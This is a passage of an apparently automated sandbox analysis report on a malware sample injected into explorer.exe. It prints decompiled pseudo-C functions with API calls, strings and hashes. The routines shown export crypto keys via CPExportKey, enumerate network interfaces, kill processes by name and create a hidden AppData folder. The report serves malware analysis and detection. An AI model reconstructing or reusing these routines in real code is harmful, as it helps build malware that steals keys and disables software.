						E003F3BF0(_t37, _t32, _t41, 0x100);
						return 0xfffffffe;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t37 = 0;
						if(0 == 0) {
							break;
						}
					}
					_v24 = 0xfffffffe;
					goto L13;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t37 = 0;
					if(0 == 0) {
						break;
					}
				}
				_v24 = 0xffffffff;
				goto L13;
			}

0x00400d80
0x00400d86
0x00400d8d
0x00400d94
0x00400d9b
0x00400da7
0x00400dac
0x00400daf
0x00400db4
0x00400dc0
0x00400dc7
0x00400dd8
0x00400de9
0x00400df0
0x00400e08
0x00400e0f
0x00400e14
0x00400e17
0x00400e22
0x00400e2e
0x00400e35
0x00400e4a
0x00000000
0x00400e50
0x00400e37
0x00400e3b
0x00400e3d
0x00400e54
0x00400e58
0x00400e5a
0x00400e5e
0x00400e5e
0x00400e69
0x00400e70
0x00400e76
0x00000000
0x00000000
0x00000000
0x00000000
0x00400df2
0x00400df2
0x00400df2
0x00400df4
0x00000000
0x00000000
0x00400df6
0x00400df8
0x00000000
0x00000000
0x00000000
0x00000000
0x00400dc9
0x00400dc9
0x00400dc9
0x00400dcb
0x00000000
0x00000000
0x00400dcd
0x00400dcf
0x00000000

APIs

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

LoadLibraryA.KERNEL32(015A0D5A), ref: 00400DBA
GetProcAddress.KERNEL32(?,015A0807), ref: 00400DE3
FreeLibrary.KERNEL32(?), ref: 00400E4A
FreeLibrary.KERNEL32(?), ref: 00400E5E

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressAllocHeapLoadProc
String ID:
API String ID: 3978381411-0
Opcode ID: 2027121f121510454d3db2ed9f119e049f07f99635a24f4abc1a4ed66a2ca4df
Instruction ID: bf6e8f31c54b3d0c8c9aecc52e2eb5948100086f53e6f6bdd9d127ec846a318b
Opcode Fuzzy Hash: 2027121f121510454d3db2ed9f119e049f07f99635a24f4abc1a4ed66a2ca4df
Instruction Fuzzy Hash: 0231AEB0900209EBDB10DBE4D948BAF7774FF44305F208A3AE215B72D0D7785A45DB9A

Uniqueness

Uniqueness Score: 2.20%

Function 0150A17A, Relevance: 6.1, APIs: 4, Instructions: 70
networkUNIQUE

Download Yara Rule

C-Code - Quality: 16%

			E0150A17A(void* __eax, void* __ecx, signed int* _a4) {
				char _v8;
				signed int _v12;
				char _t14;
				intOrPtr _t17;
				signed int _t19;
				signed int* _t20;
				void* _t21;
				void* _t22;
				signed int _t29;
				signed int _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__#23(2, 1, 6, _t33, _t21, __ecx, __ecx);
				_t22 = __eax;
				if(__eax != 0xffffffff) {
					_t14 = E01513960(__ecx, 0x1300);
					_v8 = _t14;
					if(_t14 == 0) {
						L5:
						__imp__#3(_t22);
						E01513990( &_v8, 0x1300);
						_t17 = 0;
					} else {
						__imp__WSAIoctl(_t22, 0x4004747f, 0, 0, _t14, 0x1300,  &_v12, 0, 0);
						if(_t14 != 0) {
							goto L5;
						} else {
							_t29 = 0x4c;
							_t19 = _v12 / _t29;
							 *0x1537a1c = _t19;
							if(_t19 != 0) {
								__imp__#3(_t22);
								_t20 = _a4;
								if(_t20 != 0) {
									_t30 =  *0x1537a1c; // 0x0
									 *_t20 = _t30;
								}
								_t17 = _v8;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t17 = 0;
				}
				return _t17;
			}

0x0150a189
0x0150a18c
0x0150a18f
0x0150a195
0x0150a19a
0x0150a1a7
0x0150a1ad
0x0150a1b2
0x0150a1e1
0x0150a1e2
0x0150a1ed
0x0150a1f4
0x0150a1b4
0x0150a1c4
0x0150a1cc
0x00000000
0x0150a1ce
0x0150a1d5
0x0150a1d6
0x0150a1d8
0x0150a1df
0x0150a1f9
0x0150a1ff
0x0150a204
0x0150a206
0x0150a20c
0x0150a20c
0x0150a20e
0x00000000
0x00000000
0x00000000
0x0150a1df
0x0150a1cc
0x0150a19c
0x0150a19c
0x0150a19c
0x0150a215

APIs

#23.WS2_32(00000002,00000001,00000006,?,00000000,?,?,?,01506AD8,00093A80,?,00000000,?,?,?,?), ref: 0150A18F
WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,00000000,00001300,?,00000000,00000000,00000000,?,?,?,01506AD8,00093A80,?), ref: 0150A1C4
#3.WS2_32(00000000,00000000,?,?,?,01506AD8,00093A80,?,00000000,?,?,?,?,?,01538BA8,01538C28), ref: 0150A1E2

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 4b63c5a789e70b0e7f054104ca7c6edde73b722ffa793c06711ef4ac7e7d7421
Instruction ID: 4a573686399b85bc5ed1f6d33291df797fe54f05100e922f7aa101a34544c40a
Opcode Fuzzy Hash: 4b63c5a789e70b0e7f054104ca7c6edde73b722ffa793c06711ef4ac7e7d7421
Instruction Fuzzy Hash: 851104B2600314BBE726CFA99C89D9F7BACEBCA350F100929F102DB184D7714A409720

Uniqueness

Uniqueness Score: 100.00%

Function 015170D0, Relevance: 6.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015170D0(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				signed int _v8;
				signed int _v12;
				CHAR* _v16;

				_v12 = 0;
				_v8 = 0;
				_v12 = 0;
				while(_v12 < _a8) {
					_v8 = lstrlenA( *(_a4 + _v12 * 4)) + _v8;
					if(_v12 < _a8 - 1) {
						_v8 = lstrlenA(_a12) + _v8;
					}
					_v12 = _v12 + 1;
				}
				_v16 = E01513960(_v8 + 1, _v8 + 1);
				if(_v16 != 0) {
					_v12 = 0;
					while(_v12 < _a8) {
						lstrcatA(_v16,  *(_a4 + _v12 * 4));
						if(_v12 < _a8 - 1) {
							lstrcatA(_v16, _a12);
						}
						_v12 = _v12 + 1;
					}
					return _v16;
				}
				return 0;
			}

0x015170d6
0x015170dd
0x015170e4
0x015170f6
0x01517111
0x0151711d
0x0151712c
0x0151712c
0x015170f3
0x015170f3
0x01517140
0x01517147
0x0151714d
0x0151715f
0x01517175
0x01517184
0x0151718e
0x0151718e
0x0151715c
0x0151715c
0x00000000
0x01517196
0x00000000

APIs

lstrlenA.KERNEL32(?), ref: 01517108
lstrlenA.KERNEL32(?), ref: 01517123
lstrcatA.KERNEL32(00000000,00000000), ref: 01517175
lstrcatA.KERNEL32(00000000,?), ref: 0151718E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: 1ad8110bcc7b1b376462c9eee1c635993c061aafccfd25a280719125fd3203ef
Instruction ID: 3451a9f4bee5192ab948557fa3c59b98dd767ae37e83ade0ad3784a8b9f9cb98
Opcode Fuzzy Hash: 1ad8110bcc7b1b376462c9eee1c635993c061aafccfd25a280719125fd3203ef
Instruction Fuzzy Hash: E221E575900209EFDF15CFA8C994A9DBBB6FF48304F108999E816AB309D735AB94CF44

Uniqueness

Uniqueness Score: 0.46%

Function 015247D0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015247D0(intOrPtr _a4, char* _a8) {
				char* _t6;
				char _t7;
				char* _t13;
				char* _t16;
				intOrPtr _t19;
				char* _t26;
				void* _t27;

				_t19 = _a4;
				if(_t19 == 0) {
					return _t6;
				} else {
					_t13 = _a8;
					if(_t13 == 0) {
						L7:
						return _t6;
					}
					_t26 = _t13;
					_t16 =  &(_t26[1]);
					do {
						_t7 =  *_t26;
						_t26 =  &(_t26[1]);
					} while (_t7 != 0);
					_t27 = _t26 - _t16;
					if(_t27 >= 0x50) {
						strncpy(_t19 + 0xc, "...", 3);
						_t6 = strncpy(_a4 + 0xf, _t27 - 0x4c + _t13, _t27 - _t27 - 0x4c + 1);
						goto L7;
					}
					return strncpy(_t19 + 0xc, _t13, _t27 + 1);
				}
			}

0x015247d3
0x015247d8
0x01524839
0x015247da
0x015247db
0x015247e0
0x01524837
0x00000000
0x01524837
0x015247e3
0x015247e5
0x015247e8
0x015247e8
0x015247ea
0x015247eb
0x015247ef
0x015247f4
0x0152481a
0x0152482d
0x00000000
0x01524836
0x01524808
0x01524808

APIs

strncpy.MSVCRT(-0000000C,?,?,00000000,?,?,0152486D,00000000,?,?,01523087,00000000,<string>,readrr956964,00000000), ref: 015247FD
strncpy.MSVCRT(-0000000C,...,00000003,00000000,00000000,?,?,0152486D,00000000,?,?,01523087,00000000,<string>,readrr956964,00000000), ref: 0152481A
strncpy.MSVCRT(-0000000F,00000000,?,-0000000C,...,00000003,00000000,00000000,?,?,0152486D,00000000,?,?,01523087,00000000), ref: 0152482D

Strings

..., xrefs: 01524811

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncpy
String ID: ...
API String ID: 3301158039-440645147
Opcode ID: 62bc4876cf1a4e708a29fef6d264dd9b379d68f34b80049b4120e64a7aaf5d3e
Instruction ID: c94bf6b06c9129f14cd5e66c1db7549859129055ee7f1edf8a9832abead8d703
Opcode Fuzzy Hash: 62bc4876cf1a4e708a29fef6d264dd9b379d68f34b80049b4120e64a7aaf5d3e
Instruction Fuzzy Hash: 2AF0283360127527D725591D9CC0EEB7F9DFAD2564B09822DFD892F641D5A29501C1F0

Uniqueness

Uniqueness Score: 10.55%

Function 0151B670, Relevance: 6.0, APIs: 4, Instructions: 48
stringUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E0151B670(intOrPtr _a4, WCHAR* _a8) {
				WCHAR* _v8;
				void* _v12;

				_v8 = _a8;
				if(lstrcmpiW(_a4 + 0x24, _v8) != 0) {
					return 1;
				}
				_v12 = OpenProcess(1, 0,  *(_a4 + 8));
				if(_v12 != 0) {
					if(TerminateProcess(_v12, 0) != 0) {
						while(0 != 0) {
						}
						L11:
						CloseHandle(_v12);
						L12:
						return 0;
					}
					while(0 != 0) {
					}
					goto L11;
				}
				while(0 != 0) {
				}
				goto L12;
			}

0x0151b679
0x0151b68f
0x00000000
0x0151b6df
0x0151b6a2
0x0151b6a9
0x0151b6c1
0x0151b6cb
0x0151b6cf
0x0151b6d1
0x0151b6d5
0x0151b6db
0x00000000
0x0151b6db
0x0151b6c3
0x0151b6c7
0x00000000
0x0151b6c9
0x0151b6ab
0x0151b6af
0x00000000

APIs

lstrcmpiW.KERNEL32(?,?), ref: 0151B687
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0151B69C
TerminateProcess.KERNEL32(00000000,00000000), ref: 0151B6B9
CloseHandle.KERNEL32(00000000), ref: 0151B6D5

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenTerminatelstrcmpi
String ID:
API String ID: 1385277122-0
Opcode ID: d059b7d384a4cf7bafc50e57e6f8ef5ab5297752ae291ba4bd219985a511fa87
Instruction ID: 75966deca5044547c903bff551a825b0280437d08a7f04bdb19e2a1f7598bf55
Opcode Fuzzy Hash: d059b7d384a4cf7bafc50e57e6f8ef5ab5297752ae291ba4bd219985a511fa87
Instruction Fuzzy Hash: D1017174704208EBFB22DFA8CA89B6D7BB8FF54305F144C55E906DF288D67195409B51

Uniqueness

Uniqueness Score: 37.75%

Function 003F71D0, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E003F71D0(void* __ecx, CHAR* _a4) {
				void* _v8;

				_v8 = OpenEventA(2, 0, _a4);
				if(_v8 != 0) {
					if(SetEvent(_v8) != 0) {
						CloseHandle(_v8);
						return 1;
					}
					while(0 != 0) {
					}
					CloseHandle(_v8);
					return 0;
				}
				while(0 != 0) {
				}
				return 0;
			}

0x003f71e2
0x003f71e9
0x003f7201
0x003f721b
0x00000000
0x003f7221
0x003f7203
0x003f7207
0x003f720d
0x00000000
0x003f7213
0x003f71eb
0x003f71ef
0x00000000

APIs

OpenEventA.KERNEL32(00000002,00000000,003F184E,?,?,003F184E,?), ref: 003F71DC
SetEvent.KERNEL32(00000000,?,?,003F184E), ref: 003F71F9
CloseHandle.KERNEL32(00000000,?,?,003F184E), ref: 003F720D
CloseHandle.KERNEL32(00000000,?,?,003F184E), ref: 003F721B

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Open
String ID:
API String ID: 2183081999-0
Opcode ID: ab67a23ddd56102bff737d48495436e5e173c3762f78e915ccf1e8db9347f511
Instruction ID: dd0434bb8fbd5388817f37d1384032756775116ac1492a623c8845231ebbd31f
Opcode Fuzzy Hash: ab67a23ddd56102bff737d48495436e5e173c3762f78e915ccf1e8db9347f511
Instruction Fuzzy Hash: 2BF09A7571D20CFBDB118BB0ED49BBF7668BB08340F208968FA02D6650E630DE00AB60

Uniqueness

Uniqueness Score: 3.75%

Function 003F2D30, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30
stringUNIQUE

Download Yara Rule

C-Code - Quality: 37%

			E003F2D30(void* __ecx, void* __eflags, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				short _v44;

				_v12 = 0;
				E003F9670(__ecx, __eflags, __fp0, "jkfkdm",  &_v44, 0x10);
				_v8 = E003F4730(__eflags, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown", 0x5c);
				_t4 =  &_v8; // 0x3f34ec
				if(lstrcmpiW( &_v44,  *_t4) == 0) {
					_v12 = 1;
				}
				while(0 != 0) {
				}
				return _v12;
			}

0x003f2d36
0x003f2d48
0x003f2d5f
0x003f2d62
0x003f2d72
0x003f2d74
0x003f2d74
0x003f2d7b
0x003f2d7f
0x003f2d87

APIs

Part of subcall function 003F9670: lstrlenA.KERNEL32(?,00000000,?), ref: 003F96AA
Part of subcall function 003F9670: lstrlenA.KERNEL32(?), ref: 003F970B

Part of subcall function 003F4730: _wcschr.LIBCMTD ref: 003F474C

lstrcmpiW.KERNEL32(?,4?), ref: 003F2D6A

Strings

jkfkdm, xrefs: 003F2D43
4?, xrefs: 003F2D62, 003F2D65
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown, xrefs: 003F2D52

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$_wcschrlstrcmpi
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown$jkfkdm$4?
API String ID: 3121793766-3194291887
Opcode ID: 8ebb9eae640b50f6cf797a84a2543a73df3add785d8a5cd356ed09bf8c801b81
Instruction ID: d6590df00c6a92569b284579d1c30c67acb8cb46458bbeba3efc6e795ecd079d
Opcode Fuzzy Hash: 8ebb9eae640b50f6cf797a84a2543a73df3add785d8a5cd356ed09bf8c801b81
Instruction Fuzzy Hash: FBF0A075E0060CEBDB10EBE09C86BFE7B789B04700F104075FB05BA281E7B496488BA2

Uniqueness

Uniqueness Score: 100.00%

Function 015074AF, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151
UNIQUE

Download Yara Rule

C-Code - Quality: 81%

			E015074AF(signed int __eax, void* __ebx, void* __edi, void* __fp0, struct _SECURITY_ATTRIBUTES* _a4, intOrPtr _a8) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES* _v32;
				WCHAR* _v36;
				char _v164;
				char _t48;
				WCHAR* _t50;
				struct _SECURITY_ATTRIBUTES* _t54;
				char _t55;
				void* _t56;
				void* _t61;
				void* _t75;
				void* _t76;
				void* _t78;
				void* _t85;
				void* _t90;
				char* _t91;
				char* _t92;
				struct _SECURITY_ATTRIBUTES* _t94;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;

				_t103 = __fp0;
				_t90 = __edi;
				_t78 = __ebx;
				_t94 = 0;
				_v8 = 0;
				_v28 = 0;
				_v16 = 0;
				_v24 = 0;
				_v12 = 0;
				if(_a4 == 1 || _a4 == 2) {
					_t48 = E0151C070(_a8,  &_v24);
					_v28 = _t48;
					__eflags = _t48 - _t94;
					if(__eflags != 0) {
						_push(_t78);
						_push(_t90);
						_t91 =  &_v164;
						E015071EA(_t91, __eflags, _a4);
						_push(_t94);
						_push(L"\\u");
						_t50 = E01516F50(0x15390c0);
						_push(_t94);
						_t83 = _t91;
						_push(_t91);
						_t92 = "\\";
						_push(_t92);
						_v36 = _t50;
						_v20 = E01516F50(_t50);
						CreateDirectoryW(_v36, _t94);
						_t54 = E0151FF60(_v28, _v24,  &_v16);
						_t97 = _t95 + 0x2c;
						_a4 = _t54;
						__eflags = _t54 - _t94;
						if(_t54 > _t94) {
							_t55 = E01517B80(_t83, _v20, 2, "jkfkdm", 2);
							_t98 = _t97 + 0x10;
							_v12 = _t55;
							__eflags = _t55 - _t94;
							if(_t55 != _t94) {
								_t56 = E01517F90(_t55, _v16, _a4);
								_t99 = _t98 + 0xc;
								__eflags = _t56;
								if(_t56 >= 0) {
									_push(_t94);
									E015180D0( &_v12);
									_push(_t94);
									_push( &_v164);
									_push(_t92);
									_v32 = _t94;
									_v32 = E01516F50(0x15390c0);
									_t61 = E0151BA80(_t103, _v20, _t60);
									_t99 = _t99 + 0x20;
									__eflags = _t61;
									if(_t61 < 0) {
										_v8 = 0xfffffff9;
									}
									E01513990( &_v32, 0xfffffffe);
									_pop(_t85);
									__eflags = _v8 - _t94;
									if(__eflags != 0) {
										if(__eflags >= 0) {
											goto L19;
										}
										goto L17;
									} else {
										_t75 = E01507274(_t85, __eflags);
										__eflags = _t75;
										if(_t75 >= 0) {
											L19:
											E01513990( &_v28, _v24);
											__eflags = _a4 - _t94;
											if(_a4 > _t94) {
												_t94 = _a4;
											}
											E01513990( &_v16, _t94);
											E01513990( &_v36, 0xfffffffe);
											E01513990( &_v20, 0xfffffffe);
											return _v8;
										}
										_v8 = 0xfffffffa;
										L17:
										__eflags = _v12 - _t94;
										if(_v12 != _t94) {
											_push(_t94);
											E015180D0( &_v12);
										}
										goto L19;
									}
								}
								_v8 = 0xfffffffb;
								goto L17;
							}
							_v8 = 0xfffffffc;
							goto L19;
						}
						_v8 = 0xfffffffd;
						goto L17;
					}
					_t76 = 0xfffffffe;
					return _t76;
				} else {
					return __eax | 0xffffffff;
				}
			}

0x015074af
0x015074af
0x015074af
0x015074b9
0x015074bf
0x015074c2
0x015074c5
0x015074c8
0x015074cb
0x015074ce
0x015074e5
0x015074ec
0x015074ef
0x015074f1
0x015074fb
0x015074fc
0x01507500
0x01507506
0x0150750b
0x0150750c
0x01507517
0x0150751c
0x0150751d
0x0150751f
0x01507520
0x01507525
0x01507527
0x01507536
0x01507539
0x01507549
0x0150754e
0x01507551
0x01507554
0x01507556
0x01507570
0x01507575
0x01507578
0x0150757b
0x0150757d
0x01507592
0x01507597
0x0150759a
0x0150759c
0x015075aa
0x015075ac
0x015075b1
0x015075b8
0x015075b9
0x015075bb
0x015075c7
0x015075ca
0x015075cf
0x015075d2
0x015075d4
0x015075d6
0x015075d6
0x015075e3
0x015075e9
0x015075ea
0x015075ed
0x01507601
0x00000000
0x00000000
0x00000000
0x015075ef
0x015075ef
0x015075f4
0x015075f6
0x01507614
0x0150761b
0x01507624
0x01507627
0x01507629
0x01507629
0x01507631
0x0150763c
0x01507647
0x00000000
0x0150764f
0x015075f8
0x01507603
0x01507603
0x01507606
0x0150760b
0x0150760d
0x01507613
0x00000000
0x01507606
0x015075ed
0x0150759e
0x00000000
0x0150759e
0x0150757f
0x00000000
0x0150757f
0x01507558
0x00000000
0x01507558
0x015074f5
0x00000000
0x015074d6
0x00000000
0x015074d6

APIs

CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?), ref: 01507539

Strings

jkfkdm, xrefs: 01507566
C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown, xrefs: 01507511, 01507516, 015075BA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown$jkfkdm
API String ID: 4241100979-3388936371
Opcode ID: a626a6546f2cc2adaddcc477d869cb56f3ef892afd4031343d13e0e83efb300c
Instruction ID: 6cdba7eb89aae9c82ada16029a5518de85b0bbfaad2da81ee848b0c09e90c15a
Opcode Fuzzy Hash: a626a6546f2cc2adaddcc477d869cb56f3ef892afd4031343d13e0e83efb300c
Instruction Fuzzy Hash: 68518471C0421FBADF229FE8CC449DE7BB9BF59324F204555E465AB1C4E730A640CB90

Uniqueness

Uniqueness Score: 100.00%

Function 0151AFE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122synchronizationUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00004E20,00000000), ref: 0151B0CC
GetExitCodeProcess.KERNEL32(00004E20,00000000), ref: 0151B0F1

Strings

D, xrefs: 0151B07D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CodeExitObjectProcessSingleWait
String ID: D
API String ID: 1680577353-2746444292
Opcode ID: 83599786e88cf3a215aef0271e8d6142e991a252f0b19a8c73ff5a54a5599ce0
Instruction ID: 686ad0723727b2945311e5cea9e3773d2f28d06fb79dfb95e03810f7dd12d858
Opcode Fuzzy Hash: 83599786e88cf3a215aef0271e8d6142e991a252f0b19a8c73ff5a54a5599ce0
Instruction Fuzzy Hash: D8417C74E4020A9BFF11CF98DD45BFEB7B4BB48300F144519F615AB288D7B49A44CBA6

Uniqueness

Uniqueness Score: 37.75%

Function 0151A4E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102
libraryUNIQUE

Download Yara Rule

C-Code - Quality: 52%

			E0151A4E0(CHAR* _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t29;

				_t28 = LoadLibraryA(_a4);
				_v8 = _t28;
				if(_v8 == 0) {
					return _t28;
				}
				if( *0x1538aa4 > 5) {
					while(0 != 0) {
					}
					return _t28;
				}
				_t29 = GetProcAddress(_v8, "CPExportKey");
				_v12 = _t29;
				if(_v12 != 0) {
					_v20 = 0x600;
					 *0x153aa14(_v12, _v20, 0x40,  &_v16);
					if(E0151A6F0() == 0) {
						E0151A620(_v12, _v20, 0x1536814, 6, 0x153681c);
						E0151A620(_v12, _v20, 0x1536824, 8, 0x153682c);
					} else {
						E0151A620(_v12, _v20, 0x15367f4, 6, 0x15367fc);
						E0151A620(_v12, _v20, 0x1536804, 6, 0x153680c);
						E0151A620(_v12, _v20, 0x1536834, 6, 0x153683c);
						E0151A620(_v12, _v20, 0x1536844, 0x10, 0x1536854);
					}
					return  *0x153aa14(_v12, _v20, _v16,  &_v16);
				}
				return _t29;
			}

0x0151a4ea
0x0151a4f0
0x0151a4f7
0x00000000
0x00000000
0x0151a505
0x0151a507
0x0151a50b
0x00000000
0x0151a507
0x0151a51b
0x0151a521
0x0151a528
0x0151a52e
0x0151a543
0x0151a550
0x0151a5d8
0x0151a5f4
0x0151a552
0x0151a566
0x0151a582
0x0151a59e
0x0151a5ba
0x0151a5bf
0x00000000
0x0151a60c
0x0151a615

APIs

LoadLibraryA.KERNEL32(0151A362,?,?,0151A362,018E0C3E), ref: 0151A4EA

Strings

CPExportKey, xrefs: 0151A512

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: CPExportKey
API String ID: 1029625771-1234196924
Opcode ID: 7025caf1144d4630b894ab1da472b3b3694378efa4d1358c09507cefd0f2f970
Instruction ID: 1fde7a91b8a159902d13d4173d8e803c0b70a41e371749dbb96efe2bebddc61e
Opcode Fuzzy Hash: 7025caf1144d4630b894ab1da472b3b3694378efa4d1358c09507cefd0f2f970
Instruction Fuzzy Hash: FE3152F5E41245BBEB12EBD8DC45EAFBBB9BBC8700F01485CB205AF245D6759A40C760

Uniqueness

Uniqueness Score: 100.00%

Function 0150E590, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80UNIQUE

Download Yara Rule

APIs

#18.WS2_32(00000040,00000000,00000000,00000000,?), ref: 0150E658

Strings

@, xrefs: 0150E5F0

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 49593da457887080984dc0adbe715c02113106bc5fc07d4c933d507b33090ded
Instruction ID: 7a4c46780e5e4b382feb9d106cb0dd4a73a361485d29117dad756e9652bf31e5
Opcode Fuzzy Hash: 49593da457887080984dc0adbe715c02113106bc5fc07d4c933d507b33090ded
Instruction Fuzzy Hash: F4312B70A0411C8BDB6ACF54EC827ED77B5FB55304F2489D9E64AAB2C0DAB05AC08F91

Uniqueness

Uniqueness Score: 100.00%

Function 0151B220, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76synchronizationUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0151B2AF
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 0151B2CE

Strings

D, xrefs: 0151B254

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CodeExitObjectProcessSingleWait
String ID: D
API String ID: 1680577353-2746444292
Opcode ID: b224d123a858acc5f44dc79e00ba9a612c6fff9bc6371f5e0571c4ba692e68f9
Instruction ID: d89e24f1484d6517280ef321e1c52e255d54fa0ee0d3d72dce5f3e7167a91eb6
Opcode Fuzzy Hash: b224d123a858acc5f44dc79e00ba9a612c6fff9bc6371f5e0571c4ba692e68f9
Instruction Fuzzy Hash: 89218E71A04209EBFF11CF94C949BEE7BB8BF04301F104019E615AF1C4D7B59A48CB91

Uniqueness

Uniqueness Score: 37.75%

Function 0151B150, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71synchronizationUNIQUE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,015035F9), ref: 0151B1CC
GetExitCodeProcess.KERNEL32(?,00000000), ref: 0151B1EB

Strings

D, xrefs: 0151B17D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CodeExitObjectProcessSingleWait
String ID: D
API String ID: 1680577353-2746444292
Opcode ID: deaf26cda09f4c38b92c27ea3d63ae0b354e357c98f5ddc5e956fb7695d5d6b0
Instruction ID: 5761ba0665167f3da89b4dc7870ecabd3b86330d467e4770793b96fda0339512
Opcode Fuzzy Hash: deaf26cda09f4c38b92c27ea3d63ae0b354e357c98f5ddc5e956fb7695d5d6b0
Instruction Fuzzy Hash: 41219F75A40309EBFB22CFA4CD49BEE77B4BB44700F104419A616AF1C4D7B49A08CB55

Uniqueness

Uniqueness Score: 37.75%

Function 015048F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67
stringUNIQUE

Download Yara Rule

C-Code - Quality: 82%

			E015048F0(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				char _v52;
				char _v116;
				void* _t28;
				signed int _t30;
				signed int _t31;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t48;

				_t48 = __eflags;
				_t40 = __ecx;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				E01513D60(__ecx,  &_v116, "jkfkdm", 0x40);
				lstrcatA( &_v116, "2");
				E0151CF00(_t48,  &_v52,  &_v116);
				E01513BA0(_t40,  &_v116, 0, 0x40);
				_push( &_v52);
				_t28 = E0151CDF3(_t40);
